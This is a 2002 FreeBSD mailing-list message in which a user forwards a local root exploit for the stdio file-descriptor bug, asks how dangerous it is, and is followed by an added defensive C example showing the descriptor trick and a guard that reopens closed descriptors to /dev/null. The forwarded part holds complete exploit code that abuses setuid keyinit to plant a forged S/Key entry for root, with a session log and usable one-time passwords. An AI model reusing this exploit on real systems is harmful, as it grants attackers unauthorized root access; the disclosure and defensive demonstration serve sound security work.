From owner-freebsd-current Thu Apr 25 1:23: 1 2002
Delivered-To: freebsd-current@freebsd.org
Received: from gate.uai.etel.ru (gate.uai.etel.ru [195.38.57.243]) by hub.freebsd.org (Postfix) with ESMTP id 9CF5837B422 for ; Thu, 25 Apr 2002 01:22:50 -0700 (PDT)
Received: by sendmail of gate.uai.etel.ru id g3P8Mp821194 for ; Thu, 25 Apr 2002 14:22:51 +0600
X-Authentication-Warning: gate.uai.etel.ru: smap set sender to using -f
Received: from by gate.uai.etel.ru via smap (V2.1) id xma021012; Thu, 25 Apr 02 14:21:52 +0600
Received: by sendmail with ESMTP id g3P8Lo5H025630 from vlad@telecom.ural.ru for ; Thu, 25 Apr 2002 14:21:50 +0600
Received: by sendmail id g3P8LoWV025629 for freebsd-current@freebsd.org.KAV; Thu, 25 Apr 2002 14:21:50 +0600
Received: by sendmail with ESMTP id g3P8Ln5H025612; Thu, 25 Apr 2002 14:21:49 +0600
Date: Thu, 25 Apr 2002 14:22:10 +0600
From: "Vladimir G. Drobyshevsky"
X-Mailer: The Bat! (v1.60c) UNREG / CD5BF9353B3B7091
Reply-To: "Vladimir G. Drobyshevsky"
Organization: Computer saloons "TelescOp"
X-Priority: 3 (Normal)
Message-ID: <129604079.20020425142210@telecom.ural.ru>
To: freebsd-stable@freebsd.org, freebsd-current@freebsd.org
Subject: FreeBSD security hole?
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-current@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.ORG

Have a nice day!
Yesterday I received this message from one of the Linux guys:

--- forward message ---

/*
 phased/b10z phased@snosoft.com 23/04/2002

 stdio kernel bug in All releases of FreeBSD up to and including 4.5-RELEASE

 decided to make a trivial exploit to easily get root :)

 > id
 uid=1003(phased) gid=999(phased) groups=999(phased)
 > ./iosmash
 Adding phased:   <--- HIT CTRL-C --->
 > su
 s/key 98 snosoft2
 Password:MASS OAT ROLL TOOL AGO CAM
 xes#

 this program makes the following skeys valid

 95: CARE LIVE CARD LOFT CHIC HILL
 96: TESS OIL WELD DUD MUTE KIT
 97: DADE BED DRY JAW GRAB NOV
 98: MASS OAT ROLL TOOL AGO CAM
 99: DARK LEW JOLT JIVE MOS WHO

 cheers
 Joost Pol
*/

#include <stdio.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
        /* Fill the descriptor table with copies of stdout until dup() fails,
         * then free descriptor 2: it is now the only free descriptor, so the
         * first file keyinit opens is assigned descriptor 2, i.e. its stderr. */
        while (dup(1) != -1)
                ;
        close(2);
        /* Run the setuid keyinit with argv[0] shaped like an S/Key database
         * record for root (sequence 0099, seed snosoft2), wrapped in newlines
         * so that it forms a line of its own wherever keyinit prints it. */
        execl("/usr/bin/keyinit",
              "\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n",
              (char *)NULL);
        return 1; /* only reached if execl() fails */
}

--- forward message ---

He asked me to verify that information. I did, and it works.

And the second message, which I received today:

--- message ---

phased had some comments he wanted me to forward on to the lists in regards to his latest exploit. He says that skeys are used via all authentication methods... i.e. telnet, so someone could change the user to someone in the wheel group. Haven't used skeys via ssh yet but I presume it works. Root obviously can't just telnet in by default but usually can ssh, but if the box being exploited contains people in the wheel group you can change the root user in the exploit to any user to log in via skeys as that user.

--- message ---

I do not understand the internals of the system so well; I only see that within 30 seconds I got access to the root account (of course, from the account of a user who is in group wheel; otherwise su, naturally, does not give access). Therefore I ask you to comment on these messages. How dangerous can it be?

--
Sincerely yours,
Vl
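An added example, not part of Vladimir's message or of the exploit he forwards: a small C program that shows the descriptor primitive the posted exploit relies on and, beside it, the guard against it. With descriptor 2 closed at the moment a program starts, the first file it opens is assigned descriptor 2, so anything it then writes to its error stream lands in that file; the guard is what a setuid program (or the kernel's exec path) should do before touching any file, namely check that 0, 1 and 2 are open and point any closed one at /dev/null so no later open() can land on them. The example does not involve keyinit or any S/Key file; the diagnostic string, the scratch path under /tmp and the function names are constructed for the demonstration, and it assumes a POSIX system with a writable /tmp.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Constructed sample of what a privileged program might print on its error
 * stream; it stands in for whatever the real program writes there. */
static const char kDiagnostic[] = "\ninjected-entry-via-stderr\n";

/* Defensive guard: make sure descriptors 0, 1 and 2 are open, attaching any
 * closed one to /dev/null.  open() hands out the lowest free descriptor and
 * 0..fd-1 are open by the time we reach fd, so the new one lands exactly on
 * fd.  Returns how many descriptors had to be repaired, or -1 on error. */
int sanitize_std_fds(void)
{
    int repaired = 0;
    for (int fd = 0; fd <= 2; fd++) {
        struct stat st;
        if (fstat(fd, &st) == 0)
            continue;                 /* already open, leave it alone */
        if (errno != EBADF)
            return -1;
        int nfd = open("/dev/null", fd == 0 ? O_RDONLY : O_WRONLY);
        if (nfd != fd) {
            if (nfd >= 0) close(nfd);
            return -1;
        }
        repaired++;
    }
    return repaired;
}

/* Attacker-side primitive, run in-process: start from a normal 0/1/2 state,
 * save the real stderr, close 2, open `path`, write the diagnostic to fd 2
 * the way a program would write to stderr, then restore stderr.  Returns the
 * descriptor open() handed out: 2 on an unguarded setup, -1 on failure. */
int demo_stderr_into_file(const char *path)
{
    if (sanitize_std_fds() < 0) return -1;   /* assumption: 0,1,2 exist */
    int saved = dup(STDERR_FILENO);
    if (saved < 0) return -1;
    close(STDERR_FILENO);
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd >= 0) {
        /* The program believes this goes to the terminal. */
        ssize_t w = write(STDERR_FILENO, kDiagnostic, sizeof kDiagnostic - 1);
        (void)w;
        close(fd);
    }
    dup2(saved, STDERR_FILENO);               /* put the real stderr back */
    close(saved);
    return fd;
}

/* Same scenario with the guard applied after descriptor 2 was closed.
 * Returns the descriptor open() assigns to `path` (3 or higher when the
 * guard worked), or -1 if the guard did not repair exactly descriptor 2. */
int demo_with_guard(const char *path)
{
    if (sanitize_std_fds() < 0) return -1;
    int saved = dup(STDERR_FILENO);
    if (saved < 0) return -1;
    close(STDERR_FILENO);
    int fixed = sanitize_std_fds();           /* reattaches fd 2 to /dev/null */
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd >= 0) {
        ssize_t w = write(STDERR_FILENO, kDiagnostic, sizeof kDiagnostic - 1);
        (void)w;                              /* goes to /dev/null now */
        close(fd);
    }
    dup2(saved, STDERR_FILENO);
    close(saved);
    return fixed == 1 ? fd : -1;
}

/* Read `path` back into buf as a C string; returns bytes read or -1. */
ssize_t read_back(const char *path, char *buf, size_t cap)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    ssize_t n = read(fd, buf, cap - 1);
    close(fd);
    if (n < 0) return -1;
    buf[n] = '\0';
    return n;
}

int main(void)
{
    const char *path = "/tmp/stdio_fd_demo.txt";   /* constructed scratch path */
    char buf[128];
    int fd = demo_stderr_into_file(path);
    ssize_t n = read_back(path, buf, sizeof buf);
    printf("unguarded: open() returned fd %d, file holds %zd bytes\n", fd, n);
    fd = demo_with_guard(path);
    n = read_back(path, buf, sizeof buf);
    printf("guarded:   open() returned fd %d, file holds %zd bytes\n", fd, n);
    return 0;
}
```

Unguarded, open() returns 2 and the scratch file ends up containing the diagnostic; with the guard in place open() returns a descriptor of 3 or higher and the file stays empty. The posted exploit additionally fills the table with dup(1) before closing 2, with the effect that exactly one open() in the target can succeed and it receives descriptor 2; closing 2 alone is enough to show where the next open() lands, so the example omits that step.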